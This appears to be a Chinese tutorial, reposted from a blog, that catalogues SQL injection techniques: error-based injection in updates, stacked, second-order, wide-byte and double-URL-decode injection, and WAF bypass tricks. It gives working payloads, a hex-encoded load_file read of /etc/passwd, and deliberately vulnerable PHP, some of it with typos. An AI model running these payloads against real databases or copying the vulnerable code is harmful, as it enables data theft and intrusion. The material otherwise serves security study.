一、更新注入
所有更新类操作只返回布尔型结果,不会返回数据,所以核心是构造报错注入的Payload
insert into users(username,password,role) values('fjc667' or updatexml(1,concat(0x7e,database(),0x7e),1) or '','123456','user')
update users set username = 'jcjc' where userid=1 or updatexml(1,1)
update users set password = '1111' or updatexml(1,1) or '' where userid=1
delete from users where userid=14 or updatexml(1,1)
更新类的注入适用于HTTP头注入(无论哪里注入,只要其字段可以操作到数据库就行)
二、堆叠注入
select * from users where userid=1; update user set password='123456789' where userid=1
select * from users where usernam='fjc663'; update user set password='123456789' where userid=1#'
上述Payload的PHP复现代码
include "common.php";
$conn = create_connection_oop();
$id = $_GET['id'];
$conn -> multi_query("select * from users where userid=$id");
$result = $conn -> store_result();
$rows = $result -> fecth_row();
var_dumpp($rows);
三、二次注入
// 第一步:先完成注册,使用addslashes
$username = addslashes($_POST['username']);
$password = addslashes($_POST['password']);
$sql = "insert into users(username,password) values('$username','password');
$conn->query($sql);
// 第二步:修改用户密码
$username = $_POST['username'];
$password = $_POST['password'];
$sql = "update users set password='$password' where username='$username'";
$conn->query($sql);
四、宽字节注入
正常sql语句:select * from article where articleid=‘1’;
当输入1’ 时,在addslashes函数的保护下,单引号 ’ 被加反斜杠\转义。
被转义时的sql语句:select * from article where articleid=‘1’;
当输入1%bf时,在gbk等宽字符集的环境下,%bf和用来转义的(%5c)形成新字符 狷。
注入时的sql语句:select * from article where articleid=1%bf’ and 1=1%23;
%bf与转义符号(16进制为%5c)组合成了%bf%5c形成新字符,从而吃掉了这个转义符号,导致单引号可以闭合,形成经典的注入形式。
$conn = mysqli_connect('127.0.0.1','root','123456','learn')or die("数据库连接不成功.");
mysqli_query($conn, "set names gbk");
$id = addslashes($_GET['id']);
$sql = "select * from article where articleid='$id'";
echo $sql . "<br>";
$result = mysqli_query($conn, $sql) or die("");
$article = mysqli_fetch_assoc($result);
echo $article['headline'] . "br/><hr>" . $article['content'];
对应Payload
/security/misc.php?id=1%df' union select 1,2,3,4,5,6%23
五、URL解码注入
只要字符被转换理论上就有注入的可能,现在对sql注入的防御主要也是对各类单引号,双引号,反斜杠和null加上反斜杠进行转义。
如果某个地方使用了urldecode或者rawurldecode函数的话,就会导致二次解码生成单引号引发注入。
原理是当我们提交web参数的时候,web服务器会自动对url编码进行1次解码,假设目标有了过滤,我们提交id=1%2527时候,没有带单引号(单引号url编码为%27),这时候服务器会自动解码,解码的是%25,而%25的解码结果恰好是%(百分号),就能刚好和剩下的27组合成%27,如果程序里面还有urldecode这样的解码函数的话,将会引发二次解码,这样解码后就变成id=1’,引发注入。
所以这类注入可以搜索urldecode或者rawurldecode来挖掘。
$conn = create_connection_oop();
$id = urldecode(addslashes($_GET['id']));
ecno $id . "<br/>";
$result = $conn->query("select * from users where userid='$id'");
$rows = Sresult->fetch_row();
var_dump($rows);
/security/misc.php?id=1%2527 and 1=1--+
六、奇技淫巧
闭合与逻辑
Payload: 1' or '1'='1 闭合后:id='1'or ‘1'='1'
也可以写成:1'||'1'='1 同理也可以使用 && 表示 and
Payload: 1' or 1=1# 闭合后:id='1' or 1=1#
字符串转十六进制
所有的确定字符串,均可以使用hex函数来处理成16进制,避免引号转义
select hex('/etc/passwd'); # 输出为:2F6574632F706173737764
select load file(0x2F6574632F706173737764);
select hex('learn');
select group_concat(table_name) from information_schema.tables where table_schema=0x6C6561726E
select hex('%为什么%");
select * from article where content like 0x25E4B8BAE4BB80E4B98825;
WAF绕过
双写绕过:
select and or 等被过滤的话,可以这么构造,selselectect,anandd,
这样即使被过滤了剩余字符串也能拼接成正常语句。
大小写绕过:
SelecT,AnD,0r,可用来绕过简单的过滤手段
编码绕过:
Base64,ASCII,16进制
特殊字符绕过
空格:/**/,%20,%0a,%0d,%0b,%09,%0c,select(passwd)from(user);
and:&&, or:||
内联注释: select username from /*!users*/ /*!union*/ select 2;
00截断:sel%00ect,mysql中不会截断,但waf可能认为截断
%:sel%ect,如果是,iis+asp,百分号会被忽略
原文地址:https://blog.csdn.net/fjc0214/article/details/134820094
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 dio@foxmail.com 举报,一经查实,本站将立刻删除。